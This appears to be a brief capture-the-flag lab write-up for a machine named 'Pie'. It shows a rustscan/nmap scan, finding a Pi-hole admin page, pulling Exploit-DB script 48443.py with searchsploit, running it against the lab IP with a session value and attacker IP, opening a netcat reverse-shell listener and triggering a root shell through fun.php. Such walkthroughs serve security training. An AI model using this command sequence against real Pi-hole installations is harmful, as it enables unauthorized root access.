Pie

nmap

I prefer to use rustscan with additional nmap flags as it's faster, but you can use plain nmap

mkdir nmap
sudo rustscan -a 172.31.1.26 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan

We can see port 80 is open, let's quickly check if it's a web server.

Looks like it's really a web server, and it is running Pi hole

Navigate to /admin, and you will see the version of Pi hole in the footer

Search this Pi-hole version on searchsploit

searchsploit pi hole

Let's try to use the 6th result since it sounds more interesting than others.

First, let's mirror the exploit to our current working directory

searchsploit -m linux/webapps/48443.py

As per the author we need the following to execute the exploit.

Let's run the exploit

python 48443.py 9nm7ajvv8ncaqidomb5arjchov http://172.31.1.26/ 10.10.0.41 80

Right after the script was finished, set a reverse shell listener

nc -lnvnp 80

To trigger the shell, you have to navigate to /admin/scripts/pi-hole/php/fun.php

Then you should receive your root shell. :D

Last updated 3 years ago

Was this helpful?